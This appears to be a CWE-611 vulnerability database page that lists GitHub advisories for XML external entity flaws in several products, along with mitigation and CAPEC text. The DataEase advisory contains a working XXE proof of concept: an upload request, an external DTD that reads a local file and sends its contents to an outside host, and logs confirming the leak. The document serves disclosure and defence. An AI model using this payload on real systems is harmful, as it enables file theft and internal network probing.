Common Weakness Enumeration

CWE-611

Allowed

Improper Restriction of XML External Entity Reference

Abstraction: Base · Status: Draft

The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.

1694 vulnerabilities reference this CWE, most recent first.

GHSA-4M9P-7XG6-F4MM

Vulnerability from github – Published: 2024-09-23 20:27 – Updated: 2024-09-23 20:27
VLAI
Summary
DataEase has an XML External Entity Reference vulnerability
Details

Impact

There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.

  1. send request:
POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn

------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a

<?xml version='1.0'?>
    <!DOCTYPE xxe [
        <!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'>
        %EvilDTD;
        %LoadOOBEnt;
        %OOB;
    ]>
------WebKitFormBoundary6OZBNygiUCAZEbMn--

// 1.dtd的内容
<!ENTITY % resource SYSTEM "file:///etc/alpine-release">
        <!ENTITY % LoadOOBEnt "<!ENTITY &#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'>">
  1. After sending the request, the content of the file /etc/alpine-release is successfully read
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -

Affected versions: <= 2.10.0

Patches

The vulnerability has been fixed in v2.10.1.

Workarounds

It is recommended to upgrade the version to v2.10.1.

References

If you have any questions or comments about this advisory:

Open an issue in https://github.com/dataease/dataease Email us at wei@fit2cloud.com

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.10.0"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "io.dataease:common"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-46985"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-23T20:27:22Z",
    "nvd_published_at": "2024-09-23T16:15:06Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nThere is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.\n\n1. send request:\n```\nPOST /de2api/staticResource/upload/1 HTTP/1.1\nHost: dataease.ubuntu20.vm\nContent-Length: 348\nAccept: application/json, text/plain, */*\nout_auth_platform: default\nX-DE-TOKEN: jwt\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn\n\n------WebKitFormBoundary6OZBNygiUCAZEbMn\nContent-Disposition: form-data; name=\"file\"; filename=\"1.svg\"\nContent-Type: a\n\n\u003c?xml version=\u00271.0\u0027?\u003e\n    \u003c!DOCTYPE xxe [\n        \u003c!ENTITY % EvilDTD SYSTEM \u0027http://10.168.174.1:8000/1.dtd\u0027\u003e\n        %EvilDTD;\n        %LoadOOBEnt;\n        %OOB;\n    ]\u003e\n------WebKitFormBoundary6OZBNygiUCAZEbMn--\n\n// 1.dtd\u7684\u5185\u5bb9\n\u003c!ENTITY % resource SYSTEM \"file:///etc/alpine-release\"\u003e\n        \u003c!ENTITY % LoadOOBEnt \"\u003c!ENTITY \u0026#x25; OOB SYSTEM \u0027http://10.168.174.1:8000/?content=%resource;\u0027\u003e\"\u003e\n```\n\n2. After sending the request, the content of the file /etc/alpine-release is successfully read\n```\n::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] \"GET /1.dtd HTTP/1.1\" 200 -\n::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] \"GET /?content=3.20.0 HTTP/1.1\" 200 -\n```\n\nAffected versions: \u003c= 2.10.0\n\n### Patches\nThe vulnerability has been fixed in v2.10.1.\n\n### Workarounds\nIt is recommended to upgrade the version to v2.10.1.\n\n### References\nIf you have any questions or comments about this advisory:\n\nOpen an issue in https://github.com/dataease/dataease\nEmail us at [wei@fit2cloud.com](mailto:wei@fit2cloud.com)\n",
  "id": "GHSA-4m9p-7xg6-f4mm",
  "modified": "2024-09-23T20:27:22Z",
  "published": "2024-09-23T20:27:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dataease/dataease/security/advisories/GHSA-4m9p-7xg6-f4mm"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-46985"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dataease/dataease"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "DataEase has an XML External Entity Reference vulnerability"
}

GHSA-4Q2R-QXP6-H5J6

Vulnerability from github – Published: 2021-08-30 16:25 – Updated: 2024-10-16 21:33
VLAI
Summary
Improper Restriction of XML External Entity Reference in Quokka
Details

XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component 'quokka/core/content/views.py'.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "quokka"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.4.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-18705"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-26T16:34:46Z",
    "nvd_published_at": "2021-08-16T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "XML External Entities (XXE) in Quokka v0.4.0 allows remote attackers to execute arbitrary code via the component \u0027quokka/core/content/views.py\u0027.",
  "id": "GHSA-4q2r-qxp6-h5j6",
  "modified": "2024-10-16T21:33:50Z",
  "published": "2021-08-30T16:25:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-18705"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rochacbruno/quokka/issues/676"
    },
    {
      "type": "WEB",
      "url": "https://github.com/quokkaproject/quokka/pull/679"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/quokka/PYSEC-2021-145.yaml"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rochacbruno/quokka"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Restriction of XML External Entity Reference in Quokka"
}

GHSA-4QR6-CJV5-78XJ

Vulnerability from github – Published: 2026-01-17 09:31 – Updated: 2026-01-17 09:31
VLAI
Details

The Demo Importer Plus plugin for WordPress is vulnerable to XML External Entity Injection (XXE) in all versions up to, and including, 2.0.9 via the SVG file upload functionality. This makes it possible for authenticated attackers, with Author-level access and above, to achieve code execution in vulnerable configurations. This only impacts sites on versions of PHP older than 8.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-14478"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-01-17T08:15:51Z",
    "severity": "HIGH"
  },
  "details": "The Demo Importer Plus plugin for WordPress is vulnerable to XML External Entity Injection (XXE) in all versions up to, and including, 2.0.9 via the SVG file upload functionality. This makes it possible for authenticated attackers, with Author-level access and above, to achieve code execution in vulnerable configurations. This only impacts sites on versions of PHP older than 8.0.",
  "id": "GHSA-4qr6-cjv5-78xj",
  "modified": "2026-01-17T09:31:14Z",
  "published": "2026-01-17T09:31:14Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14478"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/demo-importer-plus/tags/2.0.6/inc/importers/class-demo-importer-plus-sites-helper.php#L88"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/browser/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php#L88"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3439643/demo-importer-plus/trunk/inc/importers/class-demo-importer-plus-sites-helper.php"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2971aa0-8287-4142-bd04-7aec1ed92e7b?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4QV7-MVG8-3455

Vulnerability from github – Published: 2022-06-03 00:00 – Updated: 2022-06-14 00:00
VLAI
Details

NetScout nGeniusONE 6.3.2 allows an XML External Entity (XXE) attack.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-45981"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-02T18:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "NetScout nGeniusONE 6.3.2 allows an XML External Entity (XXE) attack.",
  "id": "GHSA-4qv7-mvg8-3455",
  "modified": "2022-06-14T00:00:37Z",
  "published": "2022-06-03T00:00:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45981"
    },
    {
      "type": "WEB",
      "url": "https://netscout.com"
    },
    {
      "type": "WEB",
      "url": "https://www.netscout.com/securityadvisories"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4R2R-HJRW-MPQ6

Vulnerability from github – Published: 2024-11-08 12:31 – Updated: 2024-11-13 21:30
VLAI
Details

Zohocorp ManageEngine SharePoint Manager Plus versions 4503 and prior are vulnerable to authenticated XML External Entity (XXE) in the Management option.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-10839"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-11-08T11:15:03Z",
    "severity": "HIGH"
  },
  "details": "Zohocorp ManageEngine SharePoint Manager Plus versions\u00a04503 and prior are vulnerable to authenticated XML External Entity (XXE) in the Management option.",
  "id": "GHSA-4r2r-hjrw-mpq6",
  "modified": "2024-11-13T21:30:31Z",
  "published": "2024-11-08T12:31:12Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10839"
    },
    {
      "type": "WEB",
      "url": "https://www.manageengine.com/sharepoint-management-reporting/advisory/CVE-2024-10839.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4R4V-5CJX-R22J

Vulnerability from github – Published: 2022-05-14 01:21 – Updated: 2022-05-14 01:21
VLAI
Details

SAP HANA extended application services, version 1, advanced does not sufficiently validate an XML document accepted from an authenticated developer with privileges to the SAP space (XML External Entity vulnerability).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-0277"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-03-12T22:29:00Z",
    "severity": "MODERATE"
  },
  "details": "SAP HANA extended application services, version 1, advanced does not sufficiently validate an XML document accepted from an authenticated developer with privileges to the SAP space (XML External Entity vulnerability).",
  "id": "GHSA-4r4v-5cjx-r22j",
  "modified": "2022-05-14T01:21:15Z",
  "published": "2022-05-14T01:21:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0277"
    },
    {
      "type": "WEB",
      "url": "https://launchpad.support.sap.com/#/notes/2764283"
    },
    {
      "type": "WEB",
      "url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=515408080"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/107356"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RF8-J9GH-8QPH

Vulnerability from github – Published: 2022-05-24 17:00 – Updated: 2024-04-04 02:36
VLAI
Details

An issue was discovered in LabKey Server 19.1.0. Sending an SVG containing an XXE payload to the endpoint visualization-exportImage.view or visualization-exportPDF.view allows local files to be read.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-9757"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-10-29T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "An issue was discovered in LabKey Server 19.1.0. Sending an SVG containing an XXE payload to the endpoint visualization-exportImage.view or visualization-exportPDF.view allows local files to be read.",
  "id": "GHSA-4rf8-j9gh-8qph",
  "modified": "2024-04-04T02:36:23Z",
  "published": "2022-05-24T17:00:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-9757"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2019-9757"
    },
    {
      "type": "WEB",
      "url": "https://rhinosecuritylabs.com/application-security/labkey-server-vulnerabilities-to-rce"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4RJ6-9PJH-882R

Vulnerability from github – Published: 2022-05-14 03:40 – Updated: 2022-06-30 19:45
VLAI
Summary
Improper Restriction of XML External Entity Reference in Jenkins JUnit Plugin
Details

Jenkins JUnit Plugin 1.23 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.23"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.plugins:junit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-1000056"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-30T19:45:12Z",
    "nvd_published_at": "2018-02-09T23:29:00Z",
    "severity": "HIGH"
  },
  "details": "Jenkins JUnit Plugin 1.23 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.",
  "id": "GHSA-4rj6-9pjh-882r",
  "modified": "2022-06-30T19:45:12Z",
  "published": "2022-05-14T03:40:06Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000056"
    },
    {
      "type": "WEB",
      "url": "https://github.com/jenkinsci/junit-plugin/commit/15f39fc49d9f25bca872badb48e708a8bb815ea7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/junit-plugin"
    },
    {
      "type": "WEB",
      "url": "https://jenkins.io/security/advisory/2018-02-05"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Restriction of XML External Entity Reference in Jenkins JUnit Plugin"
}

GHSA-4RJJ-V6CR-F48F

Vulnerability from github – Published: 2023-03-22 00:30 – Updated: 2023-03-24 06:30
VLAI
Details

Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-46286"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-21T23:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Versions of VISAM VBASE Automation Base prior to 11.7.5 may disclose information if a valid user opens a specially crafted file.",
  "id": "GHSA-4rjj-v6cr-f48f",
  "modified": "2023-03-24T06:30:16Z",
  "published": "2023-03-22T00:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46286"
    },
    {
      "type": "WEB",
      "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-080-05"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4V52-8764-FM33

Vulnerability from github – Published: 2022-05-14 01:42 – Updated: 2022-05-14 01:42
VLAI
Details

autopsy version <= 4.9.0 contains a XML External Entity (XXE) vulnerability in CaseMetadata XML Parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This attack appear to be exploitable via Specially crafted CaseMetadata.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-1000838"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-611"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-12-20T15:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "autopsy version \u003c= 4.9.0 contains a XML External Entity (XXE) vulnerability in CaseMetadata XML Parser that can result in Disclosure of confidential data, denial of service, SSRF, port scanning. This attack appear to be exploitable via Specially crafted CaseMetadata.",
  "id": "GHSA-4v52-8764-fm33",
  "modified": "2022-05-14T01:42:27Z",
  "published": "2022-05-14T01:42:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000838"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sleuthkit/autopsy/issues/4236"
    },
    {
      "type": "WEB",
      "url": "https://0dd.zone/2018/10/28/autopsy-XXE"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation System Configuration

Many XML parsers and validators can be configured to disable external entity expansion.

CAPEC-221: Data Serialization External Entities Blowup

This attack takes advantage of the entity replacement property of certain data serialization languages (e.g., XML, YAML, etc.) where the value of the replacement is a URI. A well-crafted file could have the entity refer to a URI that consumes a large amount of resources to create a denial of service condition. This can cause the system to either freeze, crash, or execute arbitrary code depending on the URI.